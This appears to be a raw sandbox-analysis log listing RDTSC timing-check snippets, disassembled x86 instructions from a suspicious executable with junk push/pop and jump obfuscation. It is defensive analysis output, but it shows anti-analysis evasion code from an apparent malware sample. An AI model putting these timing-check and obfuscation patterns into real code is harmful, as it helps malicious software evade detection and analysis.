Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB9D49 second address: CB9D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB9D5A second address: CB9D77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F58F53CD38Ah 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pushad 0x00000016 popad 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC064A second address: CC064E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC064E second address: CC065A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC065A second address: CC068B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F58F4C2897Eh 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F58F4C28988h 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC068B second address: CC0691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C8B9F8 second address: C8BA07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F58F4C28976h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C8BA07 second address: C8BA0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C8BA0D second address: C8BA13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C8BA13 second address: C8BA27 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F58F53CD386h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F58F53CD386h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C8BA27 second address: C8BA38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F58F4C28992h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C8BA38 second address: C8BA3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C8BA3E second address: C8BA4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CBFB1C second address: CBFB33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F53CD392h 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CBFC78 second address: CBFC81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CBFC81 second address: CBFC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CBFC87 second address: CBFC8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CBFDD0 second address: CBFE10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F58F53CD38Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F58F53CD399h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jmp 00007F58F53CD38Ch 0x0000001b push edx 0x0000001c pop edx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC2441 second address: CC247B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F58F4C28984h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 jmp 00007F58F4C2897Eh 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC247B second address: CC24B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD398h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push esi 0x0000000c jno 00007F58F53CD38Ch 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC24B0 second address: CC24CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a pop eax 0x0000000b push 820F44A3h 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC2BFA second address: CC2BFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC30EA second address: CC3156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 jmp 00007F58F4C28981h 0x0000000c xchg eax, ebx 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F58F4C28978h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 nop 0x00000028 pushad 0x00000029 push edi 0x0000002a jmp 00007F58F4C2897Dh 0x0000002f pop edi 0x00000030 jnc 00007F58F4C2897Ch 0x00000036 popad 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F58F4C2897Fh 0x0000003f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC32AF second address: CC32B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC337C second address: CC3384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC3384 second address: CC3397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jnc 00007F58F53CD386h 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC36B0 second address: CC36C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F4C2897Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC36C2 second address: CC3716 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F58F53CD38Bh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F58F53CD388h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov edi, edx 0x0000002e xchg eax, ebx 0x0000002f jnp 00007F58F53CD38Ah 0x00000035 push ecx 0x00000036 pushad 0x00000037 popad 0x00000038 pop ecx 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC3716 second address: CC371A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC371A second address: CC3720 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC6CCF second address: CC6D37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28982h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c clc 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F58F4C28978h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 mov esi, ebx 0x0000002b jmp 00007F58F4C2897Bh 0x00000030 push 00000000h 0x00000032 mov edi, dword ptr [ebp+122D211Ch] 0x00000038 push eax 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F58F4C28985h 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC6D37 second address: CC6D3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C79177 second address: C79182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D10F94 second address: D10F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F58F4C28976h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D17B00 second address: D17B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D17B06 second address: D17B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D17B11 second address: D17B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D17B15 second address: D17B25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C7ACBC second address: C7ACC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C7ACC2 second address: C7AD02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Eh 0x00000007 jmp 00007F58F4C28981h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jno 00007F58F4C28982h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push edi 0x00000018 pushad 0x00000019 popad 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C7AD02 second address: C7AD08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C7AD08 second address: C7AD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D16B86 second address: D16BB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F58F53CD38Dh 0x0000000c jmp 00007F58F53CD38Bh 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 jnl 00007F58F53CD386h 0x0000001c pop edi 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D16BB4 second address: D16BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F58F4C28976h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D16BC1 second address: D16BDE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F58F53CD398h 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC19E8 second address: CC1AA8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F58F4C2897Fh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F58F4C28978h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 sbb ch, FFFFFFC6h 0x0000002b mov ebx, dword ptr [ebp+12481C12h] 0x00000031 add ecx, dword ptr [ebp+122D2C07h] 0x00000037 add eax, ebx 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007F58F4C28978h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 00000019h 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 nop 0x00000054 jmp 00007F58F4C2897Eh 0x00000059 push eax 0x0000005a pushad 0x0000005b jnp 00007F58F4C2897Ch 0x00000061 jmp 00007F58F4C28987h 0x00000066 popad 0x00000067 nop 0x00000068 sub dword ptr [ebp+122D1ED0h], ecx 0x0000006e push 00000004h 0x00000070 sub cl, FFFFFFC1h 0x00000073 xor dword ptr [ebp+122D29C0h], esi 0x00000079 push eax 0x0000007a push eax 0x0000007b push edx 0x0000007c jng 00007F58F4C28978h 0x00000082 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D16D47 second address: D16D4F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D16D4F second address: D16D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jno 00007F58F4C28976h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D16E95 second address: D16E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D16E9B second address: D16EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1F637 second address: D1F63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1F63B second address: D1F63F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1F63F second address: D1F659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F53CD394h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1F659 second address: D1F67E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F58F4C28988h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F58F4C28976h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1E985 second address: D1E98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F58F53CD386h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1EAD7 second address: D1EADB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1EADB second address: D1EAE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1EAE9 second address: D1EAFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F4C28980h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1F1AB second address: D1F1AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1F1AF second address: D1F1B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1F1B3 second address: D1F1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1F1B9 second address: D1F1BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1F1BF second address: D1F1D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F58F53CD393h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1F1D9 second address: D1F1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D26C65 second address: D26C6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D26C6B second address: D26C7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F58F4C28976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D24BDB second address: D24BF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F53CD396h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D24BF5 second address: D24C28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F58F4C2897Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F58F4C28988h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D24C28 second address: D24C43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD397h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D251C4 second address: D251C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
